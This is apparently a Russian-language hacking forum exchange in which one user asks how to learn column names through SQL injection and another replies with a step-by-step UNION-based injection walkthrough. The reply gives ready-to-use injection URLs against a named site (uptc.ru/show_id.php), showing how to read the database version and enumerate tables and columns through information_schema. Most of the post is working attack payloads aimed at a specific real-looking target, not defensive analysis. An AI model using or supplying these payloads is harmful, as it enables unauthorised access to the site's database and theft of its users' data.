Сообщение от
LokbatanLi
vot naprimer
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*
zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
Не совсем тебя понял, но попытаюсь предположить:
Выводимые поля: 4,5.
Вместо любого из них поставляем version(). Запрос принимает вид:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/*
Если версия 5, значит нам доступна information_schema, tables и columns соответственно.
Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*
Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано.
Далее - хотим узнать имя колонки. Делаем запрос:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns/*
Нужную перебираем тем же способом, что и имена таблиц.
Я тебя правильно понял, или всё ещё нет?